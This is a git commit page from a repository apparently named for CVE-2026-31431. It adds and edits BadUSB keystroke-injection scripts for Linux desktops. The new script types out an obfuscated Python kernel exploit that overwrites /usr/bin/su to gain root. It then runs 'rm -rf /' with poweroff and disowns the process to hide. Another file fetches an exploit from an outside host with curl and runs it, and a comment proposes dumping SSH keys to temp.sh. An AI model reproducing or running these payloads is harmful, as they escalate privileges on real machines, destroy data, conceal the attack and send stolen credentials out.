jon/CVE-2026-31431-tools
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added typed version to remove curl dep

Browse Source
This commit is contained in:
Jon
2026-05-01 23:49:18 +01:00
parent 188caaa434
commit d2b1466f24
3 changed files with 68 additions and 39 deletions
Download Patch File Download Diff File Expand all files Collapse all files

61
badusb/CVE-2026-31431-typed.txt Normal file
View File

@@ -0,0 +1,61 @@
REM This is BadUSB demo script for Linux/Gnome
REM #############################
REM ####### DANGER !! ###########
REM #############################
REM This script will wipe a linux machine unpatched to CVE-2026-31431
REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
REM GUI launch terminal in kde gnome plasma
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500
REM launch via hotkeys for terminal
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER
REM Clear the screen in case some banner was displayed
STRING clear
ENTER
REM Bigger shell script example
STRING cat > /tmp/cve.py << EOF
ENTER
STRING #!/usr/bin/env python3
STRING import os as g,zlib,socket as s
STRING def d(x):return bytes.fromhex(x)
STRING def c(f,t,c):
STRING a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
STRING try:u.recv(8+t)
STRING except:0
STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
STRING g.system("su")
ENTER
STRING EOF
ENTER
REM Run exploit command
STRING python3 /tmp/cve.py
ENTER
DELAY 200
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after
STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER
REM detach from the process and close terminal to hide
DELAY 200
STRING disown
ENTER
DELAY 200
STRING exit
ENTER

13
badusb/CVE-2026-31431.txt
View File

@@ -31,12 +31,13 @@ ENTER
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after REM clean up after
STRING rm -rf / STRING rm -rf / && poweroff > /dev/null 2>&1 &
REM add 5s delay enough time to think about it before hitting enter or control c
DELAY 5000
ENTER ENTER
REM poweroff to hide the crash afer 3 seconds and shell will run when rm is done REM detach from the process and close terminal to hide
DELAY 3000 DELAY 200
STRING poweroff STRING disown
ENTER
DELAY 200
STRING exit
ENTER ENTER

33
badusb/payload.txt
View File

@@ -1,23 +1,3 @@
REM #############################
REM ####### DANGER !! ###########
REM #############################
REM This script will wipe a linux machine unpatched to CVE-2026-31431
REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
REM GUI launch terminal in kde gnome plasma
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500
REM launch via hotkeys for terminal
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER
REM make attack file and exec REM make attack file and exec
STRING curl https://copy.fail/exp -o cve.py STRING curl https://copy.fail/exp -o cve.py
@@ -28,16 +8,3 @@ STRING python3 cve.py
ENTER ENTER
ENTER ENTER
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after
STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER
REM detach from the process and close terminal to hide
delay 100
STRING disown
ENTER
delay 100
STRING exit
ENTER